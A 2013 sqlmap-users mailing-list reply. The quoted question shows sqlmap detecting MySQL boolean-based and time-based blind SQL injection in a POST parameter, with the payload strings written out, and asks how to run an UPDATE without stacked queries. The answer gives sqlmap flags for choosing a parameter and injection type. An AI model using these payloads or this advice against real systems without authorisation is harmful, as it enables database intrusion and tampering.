Re: [sqlmap-users] stacked queries and different injection points
From: Leon J. <leo...@gm...> - 2013-02-18 08:03:56
On Monday, February 18, 2013, Bruno Garcia wrote:
> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there any way I could test the queries with
> the second injection?
>

Hello,

I am not at a computer now, so this is out of my head.

If you want to test a specific parameter, use -p parameter_name, if you want to use a specific injection type that was detected, use --type=E as an example for error-based injection.

--
Regards L.

Sent using electronic mail ツ